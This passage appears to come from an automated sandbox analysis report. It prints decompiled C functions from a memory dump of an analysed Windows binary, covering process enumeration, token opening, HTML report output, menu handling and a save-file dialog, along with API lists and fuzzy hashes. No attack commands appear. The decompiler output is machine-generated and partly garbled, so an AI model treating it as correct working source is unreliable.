                                                                                                                                                                                                                          • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                                                                          • String ID: netmsg.dll
                                                                                                                                                                                                                          • API String ID: 2767993716-3706735626
                                                                                                                                                                                                                          • Opcode ID: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                                                                                                                                          • Instruction ID: 89adc518ee94488043421af4a237527fbec77c55aa854962abbb3bd0e0f931e1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F01D471200114FAEB152B61DD8AE9F7A6CEB46796B20417AFA02B60D1DB755E0086AC
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040598B, Relevance: 12.1, APIs: 8, Instructions: 96COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                                          			E0040598B(void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				char _v72;
				void _v582;
				long _v584;
				void* __edi;
				intOrPtr _t27;
				wchar_t* _t34;
				wchar_t* _t42;
				long* _t43;
				int _t44;
				void* _t52;
				void* _t54;
				long _t56;
				long* _t57;
				void* _t60;

				_t60 = __eflags;
				_t52 = __edx;
				E004095AB( &_v72);
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				E004095FD(_t52, _t60,  &_v72);
				_t27 = 0;
				_v12 = 0;
				if(_v20 <= 0) {
					L10:
					_t56 = 0;
				} else {
					do {
						_t57 = E00405A92(_t27,  &_v32);
						if(E00409A94( *_t57,  &_v584) == 0) {
							goto L9;
						} else {
							_t34 =  &_v584;
							_push(_t34);
							_push(_a4);
							L0040B278();
							if(_t34 == 0) {
								L5:
								_t44 = 0;
								_t54 = OpenProcess(0x2000000, 0,  *_t57);
								if(_t54 == 0) {
									goto L9;
								} else {
									_v16 = _v16 & 0;
									if(OpenProcessToken(_t54, 2,  &_v16) != 0) {
										_t44 = 1;
										CloseHandle(_v16);
									}
									CloseHandle(_t54);
									if(_t44 != 0) {
										_t56 =  *_t57;
									} else {
										goto L9;
									}
								}
							} else {
								_t42 = wcschr( &_v584, 0x5c);
								if(_t42 == 0) {
									goto L9;
								} else {
									_t43 =  &(_t42[0]);
									_push(_t43);
									_push(_a4);
									L0040B278();
									if(_t43 != 0) {
										goto L9;
									} else {
										goto L5;
									}
								}
							}
						}
						goto L12;
						L9:
						_t27 = _v12 + 1;
						_v12 = _t27;
					} while (_t27 < _v20);
					goto L10;
				}
				L12:
				E004095DA( &_v72);
				return _t56;
			}





















                                                                                                                                                                                                                          0x0040598b
                                                                                                                                                                                                                          0x0040598b
                                                                                                                                                                                                                          0x0040599a
                                                                                                                                                                                                                          0x004059ae
                                                                                                                                                                                                                          0x004059b5
                                                                                                                                                                                                                          0x004059c1
                                                                                                                                                                                                                          0x004059c6
                                                                                                                                                                                                                          0x004059cb
                                                                                                                                                                                                                          0x004059ce
                                                                                                                                                                                                                          0x00405a7b
                                                                                                                                                                                                                          0x00405a7b
                                                                                                                                                                                                                          0x004059d4
                                                                                                                                                                                                                          0x004059d4
                                                                                                                                                                                                                          0x004059dc
                                                                                                                                                                                                                          0x004059ee
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004059f0
                                                                                                                                                                                                                          0x004059f0
                                                                                                                                                                                                                          0x004059f6
                                                                                                                                                                                                                          0x004059f7
                                                                                                                                                                                                                          0x004059fa
                                                                                                                                                                                                                          0x00405a03
                                                                                                                                                                                                                          0x00405a2b
                                                                                                                                                                                                                          0x00405a2e
                                                                                                                                                                                                                          0x00405a3c
                                                                                                                                                                                                                          0x00405a40
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405a42
                                                                                                                                                                                                                          0x00405a42
                                                                                                                                                                                                                          0x00405a54
                                                                                                                                                                                                                          0x00405a59
                                                                                                                                                                                                                          0x00405a5a
                                                                                                                                                                                                                          0x00405a5a
                                                                                                                                                                                                                          0x00405a61
                                                                                                                                                                                                                          0x00405a69
                                                                                                                                                                                                                          0x00405a7f
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405a69
                                                                                                                                                                                                                          0x00405a05
                                                                                                                                                                                                                          0x00405a0e
                                                                                                                                                                                                                          0x00405a17
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405a19
                                                                                                                                                                                                                          0x00405a19
                                                                                                                                                                                                                          0x00405a1c
                                                                                                                                                                                                                          0x00405a1d
                                                                                                                                                                                                                          0x00405a20
                                                                                                                                                                                                                          0x00405a29
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405a29
                                                                                                                                                                                                                          0x00405a17
                                                                                                                                                                                                                          0x00405a03
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405a6b
                                                                                                                                                                                                                          0x00405a6e
                                                                                                                                                                                                                          0x00405a72
                                                                                                                                                                                                                          0x00405a72
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004059d4
                                                                                                                                                                                                                          0x00405a81
                                                                                                                                                                                                                          0x00405a84
                                                                                                                                                                                                                          0x00405a8f

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004059B5
                                                                                                                                                                                                                            • Part of subcall function 004095FD: CreateToolhelp32Snapshot.KERNEL32 ref: 00409619
                                                                                                                                                                                                                            • Part of subcall function 004095FD: memset.MSVCRT ref: 0040962E
                                                                                                                                                                                                                            • Part of subcall function 004095FD: Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                                                                                                                                            • Part of subcall function 004095FD: Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                                                                                                                                            • Part of subcall function 004095FD: CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                                                                                                                                            • Part of subcall function 00409A94: memset.MSVCRT ref: 00409AB7
                                                                                                                                                                                                                            • Part of subcall function 00409A94: memset.MSVCRT ref: 00409ACF
                                                                                                                                                                                                                            • Part of subcall function 00409A94: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                                                                                                                                            • Part of subcall function 00409A94: memset.MSVCRT ref: 00409B25
                                                                                                                                                                                                                            • Part of subcall function 00409A94: GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                                                                                                                                            • Part of subcall function 00409A94: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                                                                                                                                            • Part of subcall function 00409A94: FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 004059FA
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00405A0E
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00405A20
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$CloseHandle$OpenProcess$Process32_wcsicmp$AddressCreateFirstFreeLibraryNextProcSnapshotTokenToolhelp32wcschr
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 768606695-0
                                                                                                                                                                                                                          • Opcode ID: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                                                                                                                                          • Instruction ID: 2def5e4e0f7fb713a9aee1133a075480eaa7d54608268b88a97ef3230c71c50c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18318472A00619ABDB10EBA1DD89AAF77B8EF04345F10457BE905F2191EB349E018F98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00407639, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                                                          			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v68;
				char _v108;
				void _v160;
				void* __esi;
				signed int _t55;
				void* _t57;
				wchar_t* _t67;
				intOrPtr* _t73;
				signed int _t74;
				signed int _t86;
				signed int _t95;
				intOrPtr* _t98;
				void* _t100;
				void* _t102;

				_t73 = __ebx;
				_t74 = 0xd;
				_push(9);
				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
				_t102 = _t100 + 0x18;
				asm("movsw");
				E00407343(__ebx, _a4, L"<tr>");
				_t95 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);
						_v8 = _t55;
						_t57 =  &_v160;
						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {
							_t57 =  &_v68;
						}
						_t98 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t57;
						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);
						E0040ADC0(_v28,  &_v108);
						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);
						_t67 =  *(_t73 + 0x64);
						_t86 =  *_t67 & 0x0000ffff;
						if(_t86 == 0 || _t86 == 0x20) {
							wcscat(_t67, L"&nbsp;");
						}
						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
						_push( *((intOrPtr*)(_t73 + 0x68)));
						_push( &_v108);
						_push(_v12);
						_push(0x2000);
						_push( *((intOrPtr*)(_t73 + 0x60)));
						L0040B1EC();
						_t102 = _t102 + 0x1c;
						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
						_t95 = _t95 + 1;
					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
				}
				return E00407343(_t73, _a4, L"\r\n");
			}























                                                                                                                                                                                                                          0x00407639
                                                                                                                                                                                                                          0x00407646
                                                                                                                                                                                                                          0x00407647
                                                                                                                                                                                                                          0x00407654
                                                                                                                                                                                                                          0x0040765f
                                                                                                                                                                                                                          0x0040765f
                                                                                                                                                                                                                          0x0040766b
                                                                                                                                                                                                                          0x0040766d
                                                                                                                                                                                                                          0x00407672
                                                                                                                                                                                                                          0x00407677
                                                                                                                                                                                                                          0x0040767d
                                                                                                                                                                                                                          0x00407680
                                                                                                                                                                                                                          0x00407686
                                                                                                                                                                                                                          0x00407691
                                                                                                                                                                                                                          0x00407697
                                                                                                                                                                                                                          0x00407699
                                                                                                                                                                                                                          0x00407699
                                                                                                                                                                                                                          0x0040769c
                                                                                                                                                                                                                          0x0040769f
                                                                                                                                                                                                                          0x004076a3
                                                                                                                                                                                                                          0x004076a7
                                                                                                                                                                                                                          0x004076ab
                                                                                                                                                                                                                          0x004076b5
                                                                                                                                                                                                                          0x004076be
                                                                                                                                                                                                                          0x004076c8
                                                                                                                                                                                                                          0x004076de
                                                                                                                                                                                                                          0x004076ee
                                                                                                                                                                                                                          0x004076f1
                                                                                                                                                                                                                          0x004076f4
                                                                                                                                                                                                                          0x004076fa
                                                                                                                                                                                                                          0x00407708
                                                                                                                                                                                                                          0x0040770e
                                                                                                                                                                                                                          0x00407718
                                                                                                                                                                                                                          0x0040771d
                                                                                                                                                                                                                          0x00407723
                                                                                                                                                                                                                          0x00407724
                                                                                                                                                                                                                          0x00407727
                                                                                                                                                                                                                          0x0040772c
                                                                                                                                                                                                                          0x0040772f
                                                                                                                                                                                                                          0x00407734
                                                                                                                                                                                                                          0x0040773f
                                                                                                                                                                                                                          0x00407744
                                                                                                                                                                                                                          0x00407745
                                                                                                                                                                                                                          0x0040767d
                                                                                                                                                                                                                          0x00407760

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintfwcscat
                                                                                                                                                                                                                          • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                                          • API String ID: 384018552-4153097237
                                                                                                                                                                                                                          • Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                                                                                                                                          • Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040605E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 42%
                                                                                                                                                                                                                          			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
				struct tagMENUITEMINFOW _v0;
				int _t24;
				wchar_t* _t30;
				intOrPtr _t32;
				int _t34;
				int _t42;
				signed int _t47;
				signed int _t48;

				_t36 = __ecx;
				_t48 = _t47 & 0xfffffff8;
				E0040B550(0x203c, __ecx);
				_t24 = GetMenuItemCount(_a8);
				_t34 = _t24;
				_t42 = 0;
				if(_t34 <= 0) {
					L13:
					return _t24;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a50, 0, 0x2000);
					_t48 = _t48 + 0xc;
					_a36 =  &_a48;
					_v0.cbSize = 0x30;
					_a4 = 0x36;
					_a40 = 0x1000;
					_a16 = 0;
					_a48 = 0;
					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
					if(_t24 == 0) {
						goto L12;
					}
					if(_a48 == 0) {
						L10:
						_t56 = _a20;
						if(_a20 != 0) {
							_push(0);
							_push(_a20);
							_push(_a4);
							_t24 = E0040605E(_t36, _t56);
							_t48 = _t48 + 0xc;
						}
						goto L12;
					}
					_t30 = wcschr( &_a48, 9);
					if(_t30 != 0) {
						 *_t30 = 0;
					}
					_t31 = _a16;
					if(_a20 != 0) {
						if(_a12 == 0) {
							 *0x40fe20 =  *0x40fe20 + 1;
							_t32 =  *0x40fe20; // 0x0
							_t31 = _t32 + 0x11558;
							__eflags = _t32 + 0x11558;
						} else {
							_t17 = _t42 + 0x11171; // 0x11171
							_t31 = _t17;
						}
					}
					_t24 = E00406025(_t31,  &_a48);
					_pop(_t36);
					goto L10;
					L12:
					_t42 = _t42 + 1;
				} while (_t42 < _t34);
				goto L13;
			}











                                                                                                                                                                                                                          0x0040605e
                                                                                                                                                                                                                          0x00406061
                                                                                                                                                                                                                          0x00406069
                                                                                                                                                                                                                          0x00406074
                                                                                                                                                                                                                          0x0040607a
                                                                                                                                                                                                                          0x0040607e
                                                                                                                                                                                                                          0x00406082
                                                                                                                                                                                                                          0x00406148
                                                                                                                                                                                                                          0x0040614e
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00406088
                                                                                                                                                                                                                          0x00406088
                                                                                                                                                                                                                          0x00406093
                                                                                                                                                                                                                          0x00406098
                                                                                                                                                                                                                          0x0040609f
                                                                                                                                                                                                                          0x004060ae
                                                                                                                                                                                                                          0x004060b6
                                                                                                                                                                                                                          0x004060be
                                                                                                                                                                                                                          0x004060c6
                                                                                                                                                                                                                          0x004060ca
                                                                                                                                                                                                                          0x004060cf
                                                                                                                                                                                                                          0x004060d7
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004060de
                                                                                                                                                                                                                          0x00406129
                                                                                                                                                                                                                          0x00406129
                                                                                                                                                                                                                          0x0040612d
                                                                                                                                                                                                                          0x0040612f
                                                                                                                                                                                                                          0x00406130
                                                                                                                                                                                                                          0x00406134
                                                                                                                                                                                                                          0x00406137
                                                                                                                                                                                                                          0x0040613c
                                                                                                                                                                                                                          0x0040613c
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040612d
                                                                                                                                                                                                                          0x004060e7
                                                                                                                                                                                                                          0x004060f0
                                                                                                                                                                                                                          0x004060f2
                                                                                                                                                                                                                          0x004060f2
                                                                                                                                                                                                                          0x004060f9
                                                                                                                                                                                                                          0x004060fd
                                                                                                                                                                                                                          0x00406102
                                                                                                                                                                                                                          0x0040610c
                                                                                                                                                                                                                          0x00406112
                                                                                                                                                                                                                          0x00406117
                                                                                                                                                                                                                          0x00406117
                                                                                                                                                                                                                          0x00406104
                                                                                                                                                                                                                          0x00406104
                                                                                                                                                                                                                          0x00406104
                                                                                                                                                                                                                          0x00406104
                                                                                                                                                                                                                          0x00406102
                                                                                                                                                                                                                          0x00406122
                                                                                                                                                                                                                          0x00406128
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040613f
                                                                                                                                                                                                                          0x0040613f
                                                                                                                                                                                                                          0x00406140
                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                                                                          • String ID: 0$6
                                                                                                                                                                                                                          • API String ID: 2029023288-3849865405
                                                                                                                                                                                                                          • Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                                                                                                                                          • Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00402BEE, Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                                                          			E00402BEE(void* __ebx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				void* _t27;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				int _t41;
				int _t50;

				_t34 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x10)) == 0 ||  *((intOrPtr*)(__ebx + 0x14)) == 0) {
					return _t27;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v8 = GetSystemMetrics(0x4e);
					_v12 = GetSystemMetrics(0x4f);
					_t41 = GetSystemMetrics(0x4c);
					_t31 = GetSystemMetrics(0x4d);
					if(_v8 == 0 || _v12 == 0) {
						_v8 = GetSystemMetrics(0);
						_v12 = GetSystemMetrics(1);
						_t41 = 0;
						_t31 = 0;
					} else {
						_v8 = _v8 + _t41;
						_v12 = _v12 + _t31;
					}
					_t50 = _v20 - _v28;
					if(_t50 > 0x14) {
						_t38 = _v24;
						_t37 = _v16 - _t38;
						if(_t37 > 0x14 && _v20 > _t41 + 5) {
							_t31 = _t31 + 0xfffffff6;
							if(_t38 >= _t31) {
								_t31 = _v28;
								if(_t31 + 0x14 < _v8 && _t38 + 0x14 < _v12 &&  *((intOrPtr*)(_t34 + 0x1c)) != 0) {
									_t31 = SetWindowPos( *(_t34 + 0x10), 0, _t31, _t38, _t50, _t37, 0x204);
								}
							}
						}
					}
					return _t31;
				}
			}
















                                                                                                                                                                                                                          0x00402bee
                                                                                                                                                                                                                          0x00402bf8
                                                                                                                                                                                                                          0x00402cae
                                                                                                                                                                                                                          0x00402c08
                                                                                                                                                                                                                          0x00402c10
                                                                                                                                                                                                                          0x00402c11
                                                                                                                                                                                                                          0x00402c12
                                                                                                                                                                                                                          0x00402c13
                                                                                                                                                                                                                          0x00402c20
                                                                                                                                                                                                                          0x00402c27
                                                                                                                                                                                                                          0x00402c2e
                                                                                                                                                                                                                          0x00402c30
                                                                                                                                                                                                                          0x00402c37
                                                                                                                                                                                                                          0x00402c4b
                                                                                                                                                                                                                          0x00402c50
                                                                                                                                                                                                                          0x00402c53
                                                                                                                                                                                                                          0x00402c55
                                                                                                                                                                                                                          0x00402c3e
                                                                                                                                                                                                                          0x00402c3e
                                                                                                                                                                                                                          0x00402c41
                                                                                                                                                                                                                          0x00402c41
                                                                                                                                                                                                                          0x00402c5a
                                                                                                                                                                                                                          0x00402c60
                                                                                                                                                                                                                          0x00402c65
                                                                                                                                                                                                                          0x00402c68
                                                                                                                                                                                                                          0x00402c6d
                                                                                                                                                                                                                          0x00402c77
                                                                                                                                                                                                                          0x00402c7c
                                                                                                                                                                                                                          0x00402c7e
                                                                                                                                                                                                                          0x00402c87
                                                                                                                                                                                                                          0x00402ca5
                                                                                                                                                                                                                          0x00402ca5
                                                                                                                                                                                                                          0x00402c87
                                                                                                                                                                                                                          0x00402c7c
                                                                                                                                                                                                                          0x00402c6d
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00402cac

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00402C1C
                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00402C23
                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00402C2A
                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00402C30
                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00402C47
                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00402C4E
                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204,?,?,?,?,?,?,?,?,0040365B), ref: 00402CA5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MetricsSystem$Window
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1155976603-0
                                                                                                                                                                                                                          • Opcode ID: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                                                                                                                                          • Instruction ID: 7065afd7c6b37d04baa6ac94661e9c3c7a9384fc7fb7d7b8ebf201216021487f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9217F72D00219EBEF14DF68CE496AF7B75EF40318F11446AD901BB1C5D2B8AD81CA98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004036D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E004036D5(void* __edi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char* _v24;
				char _v28;
				char* _v48;
				intOrPtr _v56;
				intOrPtr _v60;
				int _v64;
				int _v72;
				intOrPtr _v76;
				wchar_t* _v80;
				intOrPtr _v84;
				int _v92;
				char* _v96;
				intOrPtr _v104;
				struct tagOFNA _v108;
				void _v634;
				long _v636;
				void _v2682;
				char _v2684;
				void* __ebx;
				char _t37;
				intOrPtr _t38;
				int _t46;
				signed short _t54;

				_v636 = 0;
				memset( &_v634, 0, 0x208);
				_v2684 = 0;
				memset( &_v2682, 0, 0x7fe);
				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
				_v12 = _t37;
				_t38 =  *0x40cbf0; // 0x67
				_v8 = _t38;
				_v28 = E00405B81(0x227);
				_v24 = L"*.cfg";
				_v20 = E00405B81(0x228);
				_v16 = L"*.*";
				E00405236( &_v2684,  &_v28);
				_t54 = 0xa;
				_v60 = E00405B81(_t54);
				_v104 =  *((intOrPtr*)(__edi + 0x10));
				_v48 =  &_v12;
				_v96 =  &_v2684;
				_v108 = 0x4c;
				_v92 = 0;
				_v84 = 1;
				_v80 =  &_v636;
				_v76 = 0x104;
				_v72 = 0;
				_v64 = 0;
				_v56 = 0x80806;
				_t46 = GetSaveFileNameW( &_v108);
				if(_t46 != 0) {
					wcscpy( &_v636, _v80);
					return E0040365E(__edi, 1,  &_v636);
				}
				return _t46;
			}






























                                                                                                                                                                                                                          0x004036ef
                                                                                                                                                                                                                          0x004036f6
                                                                                                                                                                                                                          0x0040370b
                                                                                                                                                                                                                          0x00403712
                                                                                                                                                                                                                          0x00403717
                                                                                                                                                                                                                          0x0040371c
                                                                                                                                                                                                                          0x0040371f
                                                                                                                                                                                                                          0x0040372c
                                                                                                                                                                                                                          0x00403735
                                                                                                                                                                                                                          0x00403738
                                                                                                                                                                                                                          0x00403744
                                                                                                                                                                                                                          0x00403751
                                                                                                                                                                                                                          0x00403758
                                                                                                                                                                                                                          0x00403760
                                                                                                                                                                                                                          0x00403769
                                                                                                                                                                                                                          0x0040376c
                                                                                                                                                                                                                          0x00403778
                                                                                                                                                                                                                          0x0040377b
                                                                                                                                                                                                                          0x0040378b
                                                                                                                                                                                                                          0x00403792
                                                                                                                                                                                                                          0x00403795
                                                                                                                                                                                                                          0x00403798
                                                                                                                                                                                                                          0x0040379b
                                                                                                                                                                                                                          0x004037a2
                                                                                                                                                                                                                          0x004037a5
                                                                                                                                                                                                                          0x004037a8
